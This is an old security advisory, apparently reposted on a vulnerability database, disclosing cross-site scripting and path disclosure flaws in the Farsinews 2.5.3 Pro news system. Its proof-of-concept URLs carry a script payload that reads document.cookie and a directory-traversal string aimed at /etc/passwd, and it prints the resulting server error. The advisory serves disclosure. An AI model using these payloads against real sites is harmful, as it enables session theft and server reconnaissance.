Farsinews Cross-Site Scripting & Path disclosure vulnerability

2006.04.15
Risk: Low
Local: No
Remote: Yes
CWE: N/A

Farsinews Cross-Site Scripting & Path disclosure vulnerability #''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' '''''''''''''''''''''''''''''''''''''''''''' #Aria-Security.net Advisory #Discovered by:R@1D3N (amin emami) #<AminRayden (at) yahoo (dot) com [email concealed]> #Gr33t to:A.u.r.a & O.u.t.l.a.w & Smok3r & behzad & majid and all Persian Security team #''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' '''''''''''''''''''''''''''''''''''''''''''' ? Software: Farsinews 2.5.3 Pro and below ? download Link:http://dl.farsinewsteam.com/?file=FarsiNews2.5.3Pro.zip ? Support Website:http://www.farsinewsteam.com/ ? advisory:http://www.aria-security.net/advisory/farsinews/farsinews042006 .txt ? Summary: Farsinews is Powerful Persian news publishing system ? Proof of Concept: XSS attack: http://[target]/[farsinews_path]/search.php?selected_search_arch=><scrip t>alert(document.cookie)</script><!-- http://[target]/[farsinews_path]/search.php?selected_search_arch=%3E%3Cs cript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21-- Path disclosure: A remote user can supply a specially crafted URL to cause the system to display an error message that discloses the installation path and other data. Bug exists in "index.php" example: http://[target]/[farsinews_path]/index.php?subaction=showfull &id=30000000000&archive=../../../../../../etc/passwd%00&start_from=&ucat = 1& Error: Warning: file(/home/cannonc/public_html/smf/test/data/archives/../../../../../../ . ./../../etc/passwd.news.arch): failed to open stream: No such file or directory in /home/cannonc/public_html/smf/test/inc/shows.inc.php on line 62 Warning: Invalid argument supplied for foreach() in /home/cannonc/public_html/smf/test/inc/shows.inc.php on line 270 Can not find an article with id:30000000000 Solution: contact advisory (at) aria-security (dot) net [email concealed]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top